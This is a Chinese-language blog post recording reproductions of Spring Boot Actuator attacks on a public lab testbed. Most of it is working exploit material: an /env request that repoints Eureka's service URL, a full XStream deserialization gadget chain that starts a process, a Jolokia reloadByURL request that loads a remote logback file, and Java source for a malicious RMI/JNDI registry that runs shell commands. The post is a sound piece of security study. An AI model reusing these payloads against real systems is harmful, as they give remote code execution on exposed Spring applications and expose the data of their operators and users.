angelwhu_blogHomeArchivesCategoriesAbout
spring actuator 攻击方式分析记录
|漏洞分析

0x00 复现记录

原文章作者已经给出了漏洞环境:https://github.com/artsploit/actuator-testbed 直接run起来就行,不用管报错信息~

1. 攻击方式一 – 通过eureka组件RCE

Spring actuator 提供了/env接口来查看和改变应用程序的环境变量~因此,找到了eureka.client.serviceUrl.defaultZone属性~ 记录2个要点:

  • 访问/env时,直接复制下面的请求再改细节,浏览器抓包改会有问题~ 
1
2
3
4
5
6
7
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 74

eureka.client.serviceUrl.defaultZone=http://127.0.0.1:8081/java/xstreampoc

XStream的payload(需要更近一步分析): 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                      <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>
  • Xstream的Payload要设置Content-Type头为application/xml(我用nginx配了下)~实际会请求/java/xstreampoc/apps/路由~
  • 使用/env看环境变量有没有改变写入~

2. 攻击方式二 – 通过jolokia组件XXE-RCE

内部是使用SAX解析XML文件的,可以XXE~
这里面涉及到了JNDI注入,Payload是这样的~

1
http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8081!/jndi_poc.xml

jndi_poc.xml内容:

1
2
3
<configuration>
<insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/evilObject" as="appName" />
</configuration>

RMI服务端JNDI的攻击代码(2种方案的限制,请看参考文章):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/**
 * 依赖条件:
 * - Tomcat8(Spring boot 内嵌), 自带Java EL包~
 */
public static void main(String[] args) throws Exception {
    System.out.println("Creating evil RMI registry on port 1097");
    Registry registry = LocateRegistry.createRegistry(1097);

    //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
    ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
    //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
    ref.add(new StringRefAddr("forceString", "x=eval"));
    //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
    ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','/Applications/Calculator.app/Contents/MacOS/Calculator']).start()\")"));

    ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
    registry.bind("evilObject", referenceWrapper);
}

JConsole工具,可以看到JMX里面的MBeans,寻找可以利用的地方~实质是通过jolokia组件,控制JMX下的MBean进行利用。请看https://jolokia.org/reference/html/protocol.html

3. 敏感信息泄漏

细心关注/trace,/env等接口可能会发现用户和应用程序的隐私数据~

0x01 RCE攻击原理ToDo

攻击方式一:实质是XStream反序列化的问题~ XStream历史上有许多不依赖第三方包就能进行反序列化攻击的问题,具体分析看看https://github.com/mbechler/marshalsec里面的攻击向量~ 攻击方式二:探讨下,JRMP和JNDI注入攻击在源码层面的原理的根本区别~

0x02 参考链接

https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
https://xz.aliyun.com/t/2233
https://www.veracode.com/blog/research/exploiting-jndi-injections-java

文章作者: angelwhu
文章链接: https://www.angelwhu.com/paper/2019/03/08/spring-actuator-attack-mode-analysis-record/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 angelwhu_blog